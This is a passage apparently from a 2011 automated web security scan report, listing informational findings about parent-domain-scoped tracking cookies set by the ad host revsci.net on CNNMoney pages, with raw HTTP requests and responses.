rsi_segs_1000000=pUPFJ0OhbgIMV5/4eRtDiz+77hsEU4sbyGIEQahp+sZykmOIPiEcz5NLjlK+OXZFXqAWbjRJXKG7UB/FoDWgm0tKyf0YP+Sv7u97rS5K8ImyDyrPSVO53vGYk8sqcD4gJ57p3A0b720jN8kTZRve2URA5/fruwm/vxXtwIi+6dJEhin+St3tJY8IuYk+mWPlNAvvQAE/VZPYblTaBC1vuihZUSskJphr97knN55mqiRwMLZ7f87oEfK6IK4krR4WrBTXqfEnLgsVirq40wjSamQ7HZbK3peV; rtc_KRSP=MLsvsdMvcT5jJQFEAxfg5uGCTOTuBKNAOyt+DH4Bad/qovyoL49o4EPgY5Q4cI6RKcj64uvtSDRfNNB59eQ6Atd9wwdJEBWHlJQQBQfPVsTJRE2friaxhIUHTb7Qt1Ld/Cxp0FbzwtFb7pvGD3flQnhCen5fhm40KdQTNKd0BhVumNQxeVXBOaSUUi0DPbnjteE8uOF+taOLv5cuwBtgWs2VBSLKJJI+/D2BTolIhikecvQJGnJiTYruoWPKVF7XhgBQYjk901Nby0eWB5RIJ84C8mWfyvcVXVJtQPbBUsmdD30aC5VeOASORa8sSaWEYhovHMuA9GwKfe8uNvlO2MnIU8ovF4QfjAY24++o18YO7jjfvmCoTj0y3vvcTY6/00zokbWg+d6SeODWzcQ=; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0+FrwIQlbWdY9tIJXlrW7glQxHOWAfAxbNrOLxUG7W+7rNyz+N5XuHolMsqIjEUlDxmqri7uMRwZ3vWVdDTEjLRvwOsNhmbcXWbqW2OMjvmS5/RVljgi+sITAC+rxapnI2A7+Y9dRhE7+CdjvL08o80TglhkXbRsoogs76r1im6xyxAzTbCjnhsfshkMzqiXR7b8Uic7kvj1aaa643hRRxxVxxLA+l+NkD8l4jdy/Ejqcv65zrHJIUHrXgXqNA5mMl3cv+lfp4bN+30AWy6HpwhzJeR; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:59 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39VEJLipj5t7J7tE47oWpHVhV4iFKGwwYtTiEeC08oMyBjaxxWiBni1QM1E2Pks7el1ydHSgFQGjjMeoVcyJZKquGLaDjIj9K/N7n8rHUJXrKMqKD7tavf3vT+2m1B9y4ATIJFGQdv5PA+At3K1fRBsTt9LrUfj0ladGeLVtCR6rwq9BG2ZKYFSaUl4t2ga11Fla/Q79wP7/FSOjVw+HRXN75eYiCsUdB4bwFTrG2ibyEVy/OlkNmi5Z5PETokXXdFGebgKbyDKYERcHK3nVIeRjWYaVDb46sPxdyvdasXi2JnwD9jkrLIv25wjkK2nUdQvMmikpnQfi3fBmN/lk+t/SILnsGxQna5RYckreoyf+Z/StFdx0LnMCDRkadLDc8meOGYQQDtDmMvXQyhaOO/JyP8qc1baN0fiCRLkfeiqcOqWibTCSrCqH3S5rq9kCx1XLH34waQbT3niPoP+3uyQvE1ejxIVTsAMLb6St2zly8uIuZDJ7xz+Pjie/lt0fXdBtBwfgnhIssvXYNXS55QFWeaaUF1vh3b1MYbz0hqkhZp4kxFvSraUkAaypu4TMMQ1zeR+ADls8Xmz9t97BM5jZfVsfs3bDjQUi6MmQ8INj77j+Yy/5b6DbKGOn98XhKBgzcVnJPY0MMwiEE6NhAM9Um1DFpS7nafdpH3jKMrtxe8TdlEuNtsCq6lqpyttc6oHNtDTP95/YbToh7L0r/mwcehqevH6xCGWRPIjly+Et5++Bkt8xBoV/enJdW8fCum9jV8gu5iBgG43lbiS0E5vZTJFT91ieqHsB4rKadXqbXAcV3l3V6SU6ThBT+xNgEIst6Zwmh6ciwYys15HyWnPiEmcRQ2v9EVLRR673MnMbKi3VuZqUndnochcxg4BCsxtWq7LMUqzyHqo0w0kpKIXep9fTXnHU2KwRta3hQN8O1WHTVeltJA9lNLe5fRkEXE52y/GcRD6yyHmZb2ipgt5TU6ji0xHXcjarkL76NjZVbAPAmI5AhaUa0m/yDRoP5J/Z4fp/e+kKYI+tQFFTu8w8FbXZUrT4V/ys8P2FfmKyZcbAzKyRy3AycaRQY0L0=; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 15 Aug 2011 18:45:59 GMT

GIF89a.............!.......,...........D..;

12.30. http://pix04.revsci.net/H07710/b3/0/3/1008211/160487930.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/160487930.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/160487930.js?D=DM_LOC%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Fmarkets%252Fmarkets_newyork%252Findex.htm%253Fhpt%253Dhp_t2%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520Markets%2520%253E%2520Markets%26DM_REF%3Dhttp%253A%252F%252Fwww.cnn.com%252F%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; rtc_KRSP=MLsvsdMvcT5jJQFEAxfg5uGCTOTuBKNAOyt+DH4Bad/qovyoL49o4EPgY5Q4cI6RKcj64uvtSDRfNNB59eQ6Atd9wwdJEBWHlJQQBQfPVsTJRE2friaxhIUHTb7Qt1Ld/Cxp0FbzwtFb7pvGD3flQnhCen5fhm40KdQTNKd0BhVumNQxeVXBOaSUUi0DPbnjteE8uOF+taOLv5cuwBtgWs2VBSLKJJI+/D2BTolIhikecvQJGnJiTYruoWPKVF7XhgBQYjk901Nby0eWB5RIJ84C8mWfyvcVXVJtQPbBUsmdD30aC5VeOASORa8sSaWEYhovHMuA9GwKfe8uNvlO2MnIU8ovF4QfjAY24++o18YO7jjfvmCoTj0y3vvcTY6/00zokbWg+d6SeODWzcQ=; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5; rsi_segs_1000000=pUPNJ0OBb3IMlZ94u+w/RLtOeq6V5KAP0RzRZ4VoCwEqMnGBvEAYmwLmqlJ+uVZFlCQhi2DTJKCiIwSrVODkg8DOMr2FtOMOhsfXMZJDruSUOybqHTG7OdUgyGlvam+0r/hCGF9SUcx9trlZ2R1UiUGH5Qr3qJwzqIIgxHeHJzlCUNIrUDc3E0DGvDB1Due56aoDfTtsUAvrJBIV+VMyr28TPp9h2EgqBqmPHQ4/QkU7ToIsqEmaBWs4qU+ibe/AgxY65bRY3PgnEhFuZ8ituuI0pf4/; udm_0=MLv39VEJLipj5t7J7tE47oWpHVhV4iFqWs1UADzreS08oMyBLZiQ7/IgF+mtwZz2GKy4+/oF2cXMwGfmQ+puGj0icMf9YSUlG8hBLlKT5bdrJyR1VwivS77kL8KwjZx/kq8f1b+ptJvRb92gRkQC10QBYhzOxeAA4t05okQ1vwvOC/MdF8aNtOattJB4BH6sUTLj9hrmTZcwDP87WvvAJbVX0LupWuCVs8gx1V/ZmPC7LRHPW4PR+iuv7aYhFgD9wfnjztDwaG6b9CxkAa0cdnR4lRN+7gZylWqdq7xeQ9oFzZ2jKT6MR0A24KWReJnCOFpT5CKfSE5C+7gHDpCp74+AOrGC40O3WD0K21wfHxAvqU+5OFIyWhqb1JZ6b54vODeO/poyVR+sfMuoYDaQz1c/noivrxBx8HVtN9RpUskOMjKAS5hDL7xXvSSLif2z6gaq6Li/Bl1yDCYT1Kx8Zi+k8PE0NK17+g7Qszuoyf4xyUaEs9w3vls4/tjpVnAH7fEczf6he3j0ktwTOoUhdATmjYDKWbSuR3daqd7SHWQYd6hsJJ7EVlY5OiuqCtM8YdfswSzSaeiANfOjPFq3o3iGiPFrNq2+oCFy8gHH/wjz/KX3qt+7PHgvCRhapigk4OBV5X7z+X5hK6gNdCfqzyl2QkksyVe18s06mVLBMJmKDn+qTW5VNJi6BYULvCoFCzW1T0TOMers4QZS2zk87dnZvJSz9lu1+yWPUh8o+9cSEkrTJ9rlC80+v4iPzjF9joWN7TzPOdGxbT66+Jl4BTN1QZbW2cNFZzfs9p8P99qk6S++Kn6CIsdxGZgsx38x1gDRGm3hsoyYIY5ShcIyy1iInLcHslA9KfR2Bm2jv/SXIhDGobwblbpGwg1MO4cb44LctZuM5Y7BMtxM+7FIqCVx9BkWWQAcIHTwa6aaOAT0WolwZnVmCAgQzgZq+0hCVCs8nrHzbAYSoOFfdUycbXWgkMHeEbfHehedv9j8H5ieiBwVp0I2rAx6RVuQ655Z0Lg0+T05in1TDNbFcwGVLD1c0Gom4+qjjFRfQMWvz/8eBID0Hc3+AuEu891qYjrHrw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w54y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0mBrwIMl594t637ir+57hsEDi5DEqzNkX2Ik9r5vw/ZgiF1vYNLjlK+Gc3/wmdDu6L/9Qgl4QT2DtLd8wxbiYqEeUUcnSXAMDKpnuGVNbHhRJLkXsWt8MvKd907Jx5GmxTcEC6fZjpEfcaKc1UvS9SSfDAuTU2Ck0ob0vjiUv367HU0+wjcuWheEBkx9ujpR9Hc4N6M2voeXCzlVjjPKvtnx8DbWJKCGu9dx1UdYuUp5TrBjYjr0Lf0NjQ/AO5hQa4ByzC+PstKvSjWycRXmphgeZZt; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:46:56 GMT; Path=/
Set-Cookie: rtc_uDs4=MLsvsVEuMD5rJhHcH4/cwKoVTCR+lWjDJl+BFHwKiypaYzCUWk4NDAY0SGU5WbrwNTw5e3gnkqviZlPtf0a8KBkcx6pLq5/dsfXHzparj9vvCUNa+IMou8lvD/lyMqPeFrVkzdFCpZXRXPDGjAgkpGpgw5KA0h0Io1kDndlNAwjhAaTb5lCG0x9hFuchMtByn0fcXZ2uoDhaLYF0VwrLJI+k95+3mSCZrFqUwFJMXz1kRUqDh56X96i+nSdcfgAqKJlqhhwJLvUrHfyyq/xUQcjxrJ+Bl8nadDAKrkbaT0sgAhWAB7gesNoT8pnkcxlNSLt3gMNq8ae1V1GwMOCQEED0DuQ5q5uqdpwo7m2TYq+cq+GSxCffrlmxymFMQv7925F7vYVxiVvilSUfRGc2PLlxkeRcJr2zYareidrpeZNlwUc=; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:46:56 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:46:56 GMT
Content-Length: 1550

/* AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC) */
rsinetsegs=['H07710_10515','H07710_10541','H07710_10343','H07710_10458','D08734_72639','H07710_50001','H07710_50002','H07710_50006','H07710_50005',
...[SNIP]...

12.31. http://pix04.revsci.net/H07710/b3/0/3/1008211/784372322.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/784372322.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/784372322.js?D=DM_LOC%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Ftechnology%252Fgoogle_motorola%252Findex.htm%253Fhpt%253Dhp_t2%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520Technology%2520%253E%2520Technology%26DM_REF%3Dhttp%253A%252F%252Fwww.cnn.com%252F%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGBxqxPi16ATScNUThNteKFr5insIjhhJfnz5/4MOhd/n6wiinE7/s0pX+4B2zcJ7hc=; rtc_GS70=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40ki4zC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99ARJ8f4YFvwAdZJA==; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; udm_0=MLv3MlMJbipn3hddo59fs/SyNUtp5oKbu+uMI45hFi1crut9DVZMSamSoBVFCRxGD5SIkS4D7WfwauVpCTw0Isk0omPT0Tbv5GMpHBVB5rNOJAP4+C/tdjadkIbYlgmXsvl6af2CYfyHx2Fc+fRI8l8hGsZQqzcAo9lQzfSm2W7ZzyQXi8WYBorNSmxkYhQQXoywAu4JjybHNxA3t69iOVyMFgoFtx1G/VLYBy2ckaOoIQANfyMKcxP+UxT3Jn7P4wgAXpu0VTPkD4N5Z7K5WidIL2L5CilY1JqslKzE1ji3W1NeFMNO9ouAijnMUhpLIVh5wexNmEO3xoxjurbe12d4EQTAQ1G4O83w0kkywHJkZ1lvDa2U/gabuvnh/a86fltTRfLC3hgQT1+ehya+ibS7NOm3Y5T9p8T7r/AVRBZmMv3ogwezAVJC8s917JE07Dl8h/jQa7j7YBBTA93WrD9BJxYWTizsonoEB5WYcFmoBk/QId91CBBXcNILKxWwqSlhyjf5AErwWPLcfEAzsTQHJhcE872Jv+ZsdTpn1XyyT4bxukBDSZGRGTw0JMZSAkdPpjsRpybMNOwZ45B6dz5MC8RRJC3Kw1+MYuyweXCNUfFJ+VnaC6FHXV8riDUULFwCNAkI0TBq/shPPICat0erHDyNmoHVEonAj7l/5KN2SAKTcTMj7DDCojn89lrgiziLJdzwDCQjximaGJ+Nnxrcl/1E44fQiTP3paeTq07w6gsCZ92FCh2OqI1FXjN+gGqWy96fehBxvVzyr2BCrWzzA8v/EaON+tZSngXUhs+gYtzqUC+NV5qgUMV79w2XXRs69BtEX8wQY2e5/7+uuwt/geJdkgLt+QIOeRPgN7x9GitTgNaD6po3S0xQCItbkSjDvL37sQk3aKzGbbygzKFbzZytJy71bToQRbkka+9nlHboploKpgM3NJ7Rxi+REO75GUPPOPr+TDJsqqT8vnWgeONaddsTuhm0tX3zgEmMZ6FK+6c=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNJ0OBbwIMV594t637GLQSUx0QQshaUYKRlElRhEc6MjPMnNZz8nFpJPW5vrupC8lCsyJmYKBhPjVRNZcigIhmqy9caPE6KAjj9+yavk/KdbJkwe/qD/Or8kPC8FIYBTx0nA0T0fc9VX1q8Mrew2PJ75Byor6dSWR9iScAMmhoNLQF6IW55JZH7Ha61eSkxX9ZGyBQDuYSF/RXWSPaxDAKJ+RpsARZZmmUlSmxPZAe/ucTRouK8HscBc0djY/73JKd3//mIFs8+rXlY3hqotZAQFItxLP6hw==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:53 GMT; Path=/
Set-Cookie: NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e6e5361&0&&4e488ee9&eb0686832faccc361b6bf55e98e31ad5; Domain=.revsci.net; Expires=Mon, 12-Sep-2011 18:45:53 GMT; Path=/
Set-Cookie: rtc_LKl6=MLsvsVMucS5jJgGEqf0+SSboi2Cf8C1vfG5Yj1wkQJlJCzBkDjdLIVHHUYDkVpOt9vI5TWNHFkzcJPsrJWZ2qOMv39nU7OucskGTXdLE59ONvvowQQXiiV1fDsHj5Fpr55See62gOSdX3JM4LRi3mVhwfdiGTWdzvGrhzKJOXYkvZHlpvba083PdzfZ+5myzKSgTOBHmeHp0TJUhcoczD2fuAvqTLxGntKbJYV6671YbsoEW/gQdTgahzNCIYU3LKx950sEl9JlU4DLN/Ye673ZdIt7H7aJumAIJakbFVhWIkFw4f2CYn9LVs7UE9Zf1C1WFsUyUb9v0ePciulBEFa+Owqho/EPO+ZCqXtQ6jDmVZBxuzqhm9k0/+9kHvcZo9RJQaZ+ZcNxz9m6RbhR6Usv7; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:53 GMT
Content-Length: 1580

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['H07710_10052','H07710_10515','H07710_10541','H07710_10343','H07710_10458','D08734_72639','H07710_50001','H07710_50002','H07710_50006',
...[SNIP]...

12.32. http://pix04.revsci.net/H07710/b3/0/3/1008211/886893878.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/886893878.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/886893878.js?D=DM_LOC%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252F2011%252F08%252F15%252Fis-google-buying-motorola-for-its-17000-patents%252F%253Fiid%253DEL%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520technology%2520%253E%2520fortune%2520tech%2520blogs%26DM_REF%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Ftechnology%252Fgoogle_motorola%252Findex.htm%253Fhpt%253Dhp_t2%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e6e5383&0&&4e488ee9&eb0686832faccc361b6bf55e98e31ad5; rtc_w54y=MLsvsVUucS5nJQFEi0OFSQGsjmcetiRaMit+bPGA4R6sZTDkRNAty6Ok5Rbj1A1ioyFEyOvtSDQ/TCNhLSQnMfFltc+1RgLHG60dAReBwur1y8NK9KN/Dcuri2m9TX0WX88UsNrZZUFvhX4gjJPA/IvQAfEyV42LBl1ycziW9oQCPM4wqBsyekr/QAwGJROYDG+0Ga8kxeAZhwipX7/SncE360pVtpvbYb286UDOyKadu9yX5vU5Qs3ZjPvH+kL8j3SfOR53vGwJNDve0naNljcfd9Bk2VzdOh+hbxPQOvocOVQO1E5oD6q+Ae+ZBJDf0rUe4vJF/hy/3qulgTgqvUqi4ANcoG/n4Wm30r3OcEpBzrZH98YC/BAiRwMdtNrapTzKSrNM3VjnPMf/vX2R/pvLCrsbixfPFoZzugmUnA==; rsi_segs_1000000=pUPNJ0OBbwIMV594t637ir85ZKw1UP1rwrKnF0RvvMpZKm8INDTToS2ouxUK6vhhP1CiHsUkC/S+LA0hUkfrTqDh02Adt9O/bxh+p4BRGIFoV5KPobve5AmF69qHl/p4Y6qkzvL/4/cH3yDSxc+IZrQuBcqFKNblvXNAngJPodmU1PMQNiadyR/shRZmjapdy9mKaOfP9eLQncoMS1JJRzzo2e/fuxejfinXLu4/xBJ1owyDCGngQ7C1ONlfjtvlWP+2zKPcenlg0O40YbxNuwTHm3FVQw==; 